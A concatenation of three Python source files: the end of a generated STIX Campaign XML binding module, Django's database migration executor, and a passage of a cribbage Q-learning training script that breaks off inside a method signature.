if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_TTP_ in self.Related_TTP:
Related_TTP_.export(lwrite, level, nsmap, namespace_, name_='Related_TTP', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedTTPsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_TTP':
obj_ = stix_common_binding.RelatedTTPType.factory()
obj_.build(child_)
self.Related_TTP.append(obj_)
super(RelatedTTPsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedTTPsType
class AttributionType(stix_common_binding.GenericRelationshipListType):
"""AttributionType specifies suspected Threat Actors attributed to a
given Campaign."""
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Attributed_Threat_Actor=None):
super(AttributionType, self).__init__(scope=scope)
if Attributed_Threat_Actor is None:
self.Attributed_Threat_Actor = []
else:
self.Attributed_Threat_Actor = Attributed_Threat_Actor
def factory(*args_, **kwargs_):
if AttributionType.subclass:
return AttributionType.subclass(*args_, **kwargs_)
else:
return AttributionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Attributed_Threat_Actor(self): return self.Attributed_Threat_Actor
def set_Attributed_Threat_Actor(self, Attributed_Threat_Actor): self.Attributed_Threat_Actor = Attributed_Threat_Actor
def add_Attributed_Threat_Actor(self, value): self.Attributed_Threat_Actor.append(value)
def insert_Attributed_Threat_Actor(self, index, value): self.Attributed_Threat_Actor[index] = value
def hasContent_(self):
if (
self.Attributed_Threat_Actor or
super(AttributionType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AttributionType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='AttributionType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='AttributionType'):
super(AttributionType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='AttributionType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AttributionType', fromsubclass_=False, pretty_print=True):
super(AttributionType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Attributed_Threat_Actor_ in self.Attributed_Threat_Actor:
Attributed_Threat_Actor_.export(lwrite, level, nsmap, namespace_, name_='Attributed_Threat_Actor', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(AttributionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Attributed_Threat_Actor':
obj_ = stix_common_binding.RelatedThreatActorType.factory()
obj_.build(child_)
self.Attributed_Threat_Actor.append(obj_)
super(AttributionType, self).buildChildren(child_, node, nodeName_, True)
# end class AttributionType
class CampaignType(stix_common_binding.CampaignBaseType):
"""The CampaignType characterizes a single cyber threat
Campaign.Specifies the relevant STIX-Campaign schema version for
this content."""
subclass = None
superclass = stix_common_binding.CampaignBaseType
def __init__(self, idref=None, id=None, timestamp=None, version=None, Title=None, Description=None, Short_Description=None, Names=None, Intended_Effect=None, Status=None, Related_TTPs=None, Related_Incidents=None, Related_Indicators=None, Attribution=None, Associated_Campaigns=None, Confidence=None, Activity=None, Information_Source=None, Handling=None, Related_Packages=None):
super(CampaignType, self).__init__(idref=idref, id=id, timestamp=timestamp)
self.xmlns = "http://stix.mitre.org/Campaign-1"
self.xmlns_prefix = "campaign"
self.xml_type = "CampaignType"
self.version = _cast(None, version)
self.Title = Title
self.Description = Description
self.Short_Description = Short_Description
self.Names = Names
if Intended_Effect is None:
self.Intended_Effect = []
else:
self.Intended_Effect = Intended_Effect
self.Status = Status
self.Related_TTPs = Related_TTPs
self.Related_Incidents = Related_Incidents
self.Related_Indicators = Related_Indicators
if Attribution is None:
self.Attribution = []
else:
self.Attribution = Attribution
self.Associated_Campaigns = Associated_Campaigns
self.Confidence = Confidence
if Activity is None:
self.Activity = []
else:
self.Activity = Activity
self.Information_Source = Information_Source
self.Handling = Handling
self.Related_Packages = Related_Packages
def factory(*args_, **kwargs_):
if CampaignType.subclass:
return CampaignType.subclass(*args_, **kwargs_)
else:
return CampaignType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Title(self): return self.Title
def set_Title(self, Title): self.Title = Title
def get_Description(self): return self.Description
def set_Description(self, Description): self.Description = Description
def get_Short_Description(self): return self.Short_Description
def set_Short_Description(self, Short_Description): self.Short_Description = Short_Description
def get_Names(self): return self.Names
def set_Names(self, Names): self.Names = Names
def get_Intended_Effect(self): return self.Intended_Effect
def set_Intended_Effect(self, Intended_Effect): self.Intended_Effect = Intended_Effect
def add_Intended_Effect(self, value): self.Intended_Effect.append(value)
def insert_Intended_Effect(self, index, value): self.Intended_Effect[index] = value
def get_Status(self): return self.Status
def set_Status(self, Status): self.Status = Status
def get_Related_TTPs(self): return self.Related_TTPs
def set_Related_TTPs(self, Related_TTPs): self.Related_TTPs = Related_TTPs
def get_Related_Incidents(self): return self.Related_Incidents
def set_Related_Incidents(self, Related_Incidents): self.Related_Incidents = Related_Incidents
def get_Related_Indicators(self): return self.Related_Indicators
def set_Related_Indicators(self, Related_Indicators): self.Related_Indicators = Related_Indicators
def get_Attribution(self): return self.Attribution
def set_Attribution(self, Attribution): self.Attribution = Attribution
def add_Attribution(self, value): self.Attribution.append(value)
def insert_Attribution(self, index, value): self.Attribution[index] = value
def get_Associated_Campaigns(self): return self.Associated_Campaigns
def set_Associated_Campaigns(self, Associated_Campaigns): self.Associated_Campaigns = Associated_Campaigns
def get_Confidence(self): return self.Confidence
def set_Confidence(self, Confidence): self.Confidence = Confidence
def get_Activity(self): return self.Activity
def set_Activity(self, Activity): self.Activity = Activity
def add_Activity(self, value): self.Activity.append(value)
def insert_Activity(self, index, value): self.Activity[index] = value
def get_Information_Source(self): return self.Information_Source
def set_Information_Source(self, Information_Source): self.Information_Source = Information_Source
def get_Handling(self): return self.Handling
def set_Handling(self, Handling): self.Handling = Handling
def get_Related_Packages(self): return self.Related_Packages
def set_Related_Packages(self, Related_Packages): self.Related_Packages = Related_Packages
def get_version(self): return self.version
def set_version(self, version): self.version = version
def hasContent_(self):
if (
self.Title is not None or
self.Description is not None or
self.Short_Description is not None or
self.Names is not None or
self.Intended_Effect or
self.Status is not None or
self.Related_TTPs is not None or
self.Related_Incidents is not None or
self.Related_Indicators is not None or
self.Attribution or
self.Associated_Campaigns is not None or
self.Confidence is not None or
self.Activity or
self.Information_Source is not None or
self.Handling is not None or
self.Related_Packages is not None or
super(CampaignType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='Campaign', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='Campaign')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='Campaign'):
super(CampaignType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='Campaign')
# if 'xmlns' not in already_processed:
# already_processed.add('xmlns')
# xmlns = " xmlns:%s='%s'" % (self.xmlns_prefix, self.xmlns)
# lwrite(xmlns)
if 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
xsi_type = " xsi:type='%s:%s'" % (self.xmlns_prefix, self.xml_type)
lwrite(xsi_type)
if self.version is not None and 'version' not in already_processed:
already_processed.add('version')
lwrite(' version=%s' % (quote_attrib(self.version), ))
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='CampaignType', fromsubclass_=False, pretty_print=True):
super(CampaignType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Title is not None:
showIndent(lwrite, level, pretty_print)
lwrite('<%s:Title>%s</%s:Title>%s' % (nsmap[namespace_], self.gds_format_string(quote_xml(self.Title).encode(ExternalEncoding), input_name='Title'), nsmap[namespace_], eol_))
if self.Description is not None:
self.Description.export(lwrite, level, nsmap, namespace_, name_='Description', pretty_print=pretty_print)
if self.Short_Description is not None:
self.Short_Description.export(lwrite, level, nsmap, namespace_, name_='Short_Description', pretty_print=pretty_print)
if self.Names is not None:
self.Names.export(lwrite, level, nsmap, namespace_, name_='Names', pretty_print=pretty_print)
for Intended_Effect_ in self.Intended_Effect:
Intended_Effect_.export(lwrite, level, nsmap, namespace_, name_='Intended_Effect', pretty_print=pretty_print)
if self.Status is not None:
self.Status.export(lwrite, level, nsmap, namespace_, name_='Status', pretty_print=pretty_print)
if self.Related_TTPs is not None:
self.Related_TTPs.export(lwrite, level, nsmap, namespace_, name_='Related_TTPs', pretty_print=pretty_print)
if self.Related_Incidents is not None:
self.Related_Incidents.export(lwrite, level, nsmap, namespace_, name_='Related_Incidents', pretty_print=pretty_print)
if self.Related_Indicators is not None:
self.Related_Indicators.export(lwrite, level, nsmap, namespace_, name_='Related_Indicators', pretty_print=pretty_print)
for Attribution_ in self.Attribution:
Attribution_.export(lwrite, level, nsmap, namespace_, name_='Attribution', pretty_print=pretty_print)
if self.Associated_Campaigns is not None:
self.Associated_Campaigns.export(lwrite, level, nsmap, namespace_, name_='Associated_Campaigns', pretty_print=pretty_print)
if self.Confidence is not None:
self.Confidence.export(lwrite, level, nsmap, namespace_, name_='Confidence', pretty_print=pretty_print)
for Activity_ in self.get_Activity():
Activity_.export(lwrite, level, nsmap, namespace_, name_='Activity', pretty_print=pretty_print)
if self.Information_Source is not None:
self.Information_Source.export(lwrite, level, nsmap, namespace_, name_='Information_Source', pretty_print=pretty_print)
if self.Handling is not None:
self.Handling.export(lwrite, level, nsmap, namespace_, name_='Handling', pretty_print=pretty_print)
if self.Related_Packages is not None:
self.Related_Packages.export(lwrite, level, nsmap, namespace_, name_='Related_Packages', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('version', node)
if value is not None and 'version' not in already_processed:
already_processed.add('version')
self.version = value
super(CampaignType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Title':
Title_ = child_.text
Title_ = self.gds_validate_string(Title_, node, 'Title')
self.Title = Title_
elif nodeName_ == 'Description':
obj_ = stix_common_binding.StructuredTextType.factory()
obj_.build(child_)
self.set_Description(obj_)
elif nodeName_ == 'Short_Description':
obj_ = stix_common_binding.StructuredTextType.factory()
obj_.build(child_)
self.set_Short_Description(obj_)
elif nodeName_ == 'Names':
obj_ = NamesType.factory()
obj_.build(child_)
self.set_Names(obj_)
elif nodeName_ == 'Intended_Effect':
obj_ = stix_common_binding.StatementType.factory()
obj_.build(child_)
self.Intended_Effect.append(obj_)
elif nodeName_ == 'Status':
obj_ = stix_common_binding.ControlledVocabularyStringType.factory()
obj_.build(child_)
self.set_Status(obj_)
elif nodeName_ == 'Related_TTPs':
obj_ = RelatedTTPsType.factory()
obj_.build(child_)
self.set_Related_TTPs(obj_)
elif nodeName_ == 'Related_Incidents':
obj_ = RelatedIncidentsType.factory()
obj_.build(child_)
self.set_Related_Incidents(obj_)
elif nodeName_ == 'Related_Indicators':
obj_ = RelatedIndicatorsType.factory()
obj_.build(child_)
self.set_Related_Indicators(obj_)
elif nodeName_ == 'Attribution':
obj_ = AttributionType.factory()
obj_.build(child_)
self.Attribution.append(obj_)
elif nodeName_ == 'Associated_Campaigns':
obj_ = AssociatedCampaignsType.factory()
obj_.build(child_)
self.set_Associated_Campaigns(obj_)
elif nodeName_ == 'Confidence':
obj_ = stix_common_binding.ConfidenceType.factory()
obj_.build(child_)
self.set_Confidence(obj_)
elif nodeName_ == 'Activity':
obj_ = stix_common_binding.ActivityType.factory()
obj_.build(child_)
self.Activity.append(obj_)
elif nodeName_ == 'Information_Source':
obj_ = stix_common_binding.InformationSourceType.factory()
obj_.build(child_)
self.set_Information_Source(obj_)
elif nodeName_ == 'Handling':
obj_ = data_marking_binding.MarkingType.factory()
obj_.build(child_)
self.set_Handling(obj_)
elif nodeName_ == "Related_Packages":
obj_ = stix_common_binding.RelatedPackageRefsType.factory()
obj_.build(child_)
self.set_Related_Packages(obj_)
super(CampaignType, self).buildChildren(child_, node, nodeName_, True)
# end class CampaignType
GDSClassesMapping = {}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout, 0, name_="Campaign",
# namespacedef_='')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"NamesType",
"AssociatedCampaignsType",
"RelatedIndicatorsType",
"RelatedIncidentsType",
"RelatedTTPsType",
"AttributionType",
"CampaignType"
]
|
|
from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations, router
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
"""
End-to-end migration execution - loads migrations, and runs them
up or down to a specified set of targets.
"""
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
"""
Given a set of targets, returns a list of (Migration instance, backwards?).
"""
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
# If the target is (app_label, None), that means unmigrate everything
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
# If the migration is already applied, do backwards mode,
# otherwise do forwards mode.
elif target in applied:
# Don't migrate backwards all the way to the target node (that
# may roll back dependencies in other apps that don't need to
# be rolled back); instead roll back through target's immediate
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def _create_project_state(self):
return ProjectState(real_apps=list(self.loader.unmigrated_apps))
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
"""
Migrates the database up to the given targets.
Django first needs to create all project states before a migration is
(un)applied and in a second step run all the database operations.
"""
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
# Nothing to do for an empty plan, except for building the post
# migrate project state
state = self._create_project_state()
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
state = self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
# No need to check for `elif all_backwards` here, as that condition
# would always evaluate to true.
state = self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
return state
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
"""
Take a list of 2-tuples of the form (migration instance, False) and
apply them in the order they occur in the full_plan.
"""
migrations_to_run = {m[0] for m in plan}
state = self._create_project_state()
applied_migrations = {
self.loader.graph.nodes[key] for key in self.loader.applied_migrations
if key in self.loader.graph.nodes
}
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
elif migration in applied_migrations:
# Only mutate the state if the migration is actually applied
# to make sure the resulting state doesn't include changes
# from unrelated migrations.
migration.mutate_state(state, preserve=False)
return state
def _migrate_all_backwards(self, plan, full_plan, fake):
"""
Take a list of 2-tuples of the form (migration instance, True) and
unapply them in reverse order they occur in the full_plan.
Since unapplying a migration requires the project state prior to that
migration, Django will compute the migration states before each of them
in a first run over the plan and then unapply them in a second run over
the plan.
"""
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = self._create_project_state()
applied_migrations = {
self.loader.graph.nodes[key] for key in self.loader.applied_migrations
if key in self.loader.graph.nodes
}
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps # Render all -- performance critical
# The state before this migration
states[migration] = state
# The old state keeps as-is, we continue with the new state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
elif migration in applied_migrations:
# Only mutate the state if the migration is actually applied
# to make sure the resulting state doesn't include changes
# from unrelated migrations.
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
applied_migrations.remove(migration)
# Generate the post migration state by starting from the state before
# the last migration is unapplied and mutating it to include all the
# remaining applied migrations.
last_unapplied_migration = plan[-1][0]
state = states[last_unapplied_migration]
for index, (migration, _) in enumerate(full_plan):
if migration == last_unapplied_migration:
for migration, _ in full_plan[index:]:
if migration in applied_migrations:
migration.mutate_state(state, preserve=False)
break
return state
def collect_sql(self, plan):
"""
Takes a migration plan and returns a list of collected SQL
statements that represent the best-efforts version of that plan.
"""
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True, atomic=migration.atomic) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
"""
Runs a migration forwards.
"""
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
# Test to see if this is an already-applied initial migration
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
# Alright, do it normally
with self.connection.schema_editor(atomic=migration.atomic) as schema_editor:
state = migration.apply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
"""
Runs a migration backwards.
"""
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor(atomic=migration.atomic) as schema_editor:
state = migration.unapply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
"""
Mark replacement migrations applied if their replaced set all are.
We do this unconditionally on every migrate, rather than just when
migrations are applied or unapplied, so as to correctly handle the case
when a new squash migration is pushed to a deployment that already had
all its replaced migrations applied. In this case no new migration will
be applied, but we still want to correctly maintain the applied state
of the squash migration.
"""
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
"""
Tests whether a migration has been implicitly applied - that the
tables or columns it would create exist. This is intended only for use
on initial migrations (as it only looks for CreateModel and AddField).
"""
def should_skip_detecting_model(migration, model):
"""
No need to detect tables for proxy models, unmanaged models, or
models that can't be migrated on the current database.
"""
return (
model._meta.proxy or not model._meta.managed or not
router.allow_migrate(
self.connection.alias, migration.app_label,
model_name=model._meta.model_name,
)
)
if migration.initial is None:
# Bail if the migration isn't the first one in its app
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
existing_table_names = self.connection.introspection.table_names(self.connection.cursor())
# Make sure all create model and add field operations are done
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# main app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if should_skip_detecting_model(migration, model):
continue
if model._meta.db_table not in existing_table_names:
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# main app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if should_skip_detecting_model(migration, model):
continue
table = model._meta.db_table
field = model._meta.get_field(operation.name)
# Handle implicit many-to-many tables created by AddField.
if field.many_to_many:
if field.remote_field.through._meta.db_table not in existing_table_names:
return False, project_state
else:
found_add_field_migration = True
continue
column_names = [
column.name for column in
self.connection.introspection.get_table_description(self.connection.cursor(), table)
]
if field.column not in column_names:
return False, project_state
found_add_field_migration = True
# If we get this far and we found at least one CreateModel or AddField migration,
# the migration is considered implicitly applied.
return (found_create_model_migration or found_add_field_migration), after_state
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
expt.py
(c) Will Roberts 12 January, 2017
Training an AI to play cribbage.
'''
from __future__ import absolute_import, print_function
import functools
import itertools
import random
from cribbage.dqlearning import DQLearner
from cribbage.game import compare_players
from cribbage.netbuilder import ModelStore, Model, build, make_input_scaler
from cribbage.neural import discard_state_repr, record_both_player_states, record_player1_states
from cribbage.player import CribbagePlayer
from cribbage.randomplayer import RandomCribbagePlayer
from cribbage.utils import doubled, numpy_memoize, random_skip
import numpy as np
def random_discard_sars_gen(random_seed=None):
'''
Infinite generator over discard (state, action, reward,
next_state) tuples, using a random player. Produces about 2700
states per second on samarkand.
Arguments:
- `random_seed`:
'''
random.seed(random_seed)
player = RandomCribbagePlayer()
while True:
discard_states1, _pcs1, discard_states2, _pcs2 = record_both_player_states(player, player)
for state in discard_states1:
yield state
for state in discard_states2:
yield state
def random_discard_state_gen(random_seed=None):
'''
Infinite generator over discard states, using a random player.
Produces about 2700 states per second on samarkand.
Arguments:
- `random_seed`:
'''
for (state, _action, _reward, state2) in random_discard_sars_gen(random_seed):
yield state
if state2 is not None:
yield state2
# ------------------------------------------------------------
# Autoencode discard() states
def build_dautoenc():
'''Construct a single-layer discard() state autoencoder.'''
# models will be stored in the models/ directory
#store = ModelStore('models')
# create and configure a new model
dautoenc = Model('models', 'dautoenc')
# network architecture
dautoenc.input(295)
dautoenc.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc.output(295, 'rectify') # Dense
dautoenc.objective('squared_error')
dautoenc.update('adadelta')
dautoenc.update_args({}) # 'learning_rate': 1.0, 'rho': 0.95, 'epsilon': 1e-6
# build a validation set with fixed random state
val_set = list(itertools.islice(doubled(random_skip(random_discard_state_gen(42))), 500))
dautoenc.validation(val_set)
# training stream with non-fixed random state
stream = doubled(random_skip(random_discard_state_gen()))
dautoenc.training(stream)
# configure training loop
dautoenc.minibatch_size(500)
dautoenc.max_num_minibatches(65000)
dautoenc.validation_interval = 250 # about five minutes on samarkand
# build the model
build(dautoenc)
# ------------------------------------------------------------
# Two-layer discard() autoencoder
def build_dautoenc2():
'''Construct a two-layer discard() state autoencoder.'''
# create and configure a new model
dautoenc2 = Model('models', 'dautoenc2')
# network architecture
dautoenc2.input(295)
dautoenc2.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc2.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc2.output(295, 'rectify') # Dense
dautoenc2.objective('squared_error')
dautoenc2.update('adadelta')
# initialise weights on first layer
dautoenc = Model('models', 'dautoenc').load_snapshot(10000)
dautoenc2.set_weights('hidden1', dautoenc.get_weights('hidden1'))
# build a validation set with fixed random state
val_set = list(itertools.islice(doubled(random_skip(random_discard_state_gen(42))), 500))
dautoenc2.validation(val_set)
# training stream with non-fixed random state
stream = doubled(random_skip(random_discard_state_gen()))
dautoenc2.training(stream)
# configure training loop
dautoenc2.minibatch_size(500)
dautoenc2.max_num_minibatches(30000)
dautoenc2.validation_interval = 250 # about five minutes on samarkand
# build the model
build(dautoenc2)
# ------------------------------------------------------------
# Q-learning on discard()
def choose_discard_actions(qlearner_model, states_matrix):
'''
Given a Model with a Q-learning neural network in it, and a matrix
of N states, returns a vector of length N containing the argmax of
the network's outputs for each state (the action the network would
choose in that state).
Arguments:
- `qlearner_model`:
- `states_matrix`:
'''
if len(states_matrix) == 0:
return np.array([], dtype=int)
output = qlearner_model.compute(states_matrix)
# only consider those actions which are possible in the given hands
masked_output = np.ma.masked_array(output, mask=~states_matrix[:,1:53].astype(bool))
return masked_output.argmax(axis=1)
class QLearningPlayer(CribbagePlayer):
'''A CribbagePlayer that plays using a Q-learned model.'''
def __init__(self, discard_model, play_card_model, epsilon):
'''
Constructor.
Arguments:
- `discard_model`:
- `play_card_model`:
- `epsilon`:
'''
super(QLearningPlayer, self).__init__()
self.discard_model = discard_model
self.play_card_model = play_card_model
self.epsilon = epsilon
def discard(self,
is_dealer,
hand,
player_score,
opponent_score):
'''Discard two cards from dealt hand into crib.'''
if self.discard_model is not None and random.random() > self.epsilon:
hand = hand[:]
hand2 = hand[:]
# choose the first card to discard
state = discard_state_repr(is_dealer,
hand,
None,
player_score,
opponent_score)
discard_value_1 = choose_discard_actions(self.discard_model, state[None, :])[0]
discard_idx_1 = hand.index(discard_value_1)
# remove the first discard from the hand and re-encode
del hand[discard_idx_1]
state = discard_state_repr(is_dealer,
hand,
discard_value_1,
player_score,
opponent_score)
discard_value_2 = choose_discard_actions(self.discard_model, state[None, :])[0]
discard_idx_2 = hand2.index(discard_value_2)
return [discard_idx_1, discard_idx_2]
return random.sample(range(6), 2)
def play_card(self,
is_dealer,
hand,
played_cards,
is_go,
linear_play,
player_score,
opponent_score,
legal_moves):
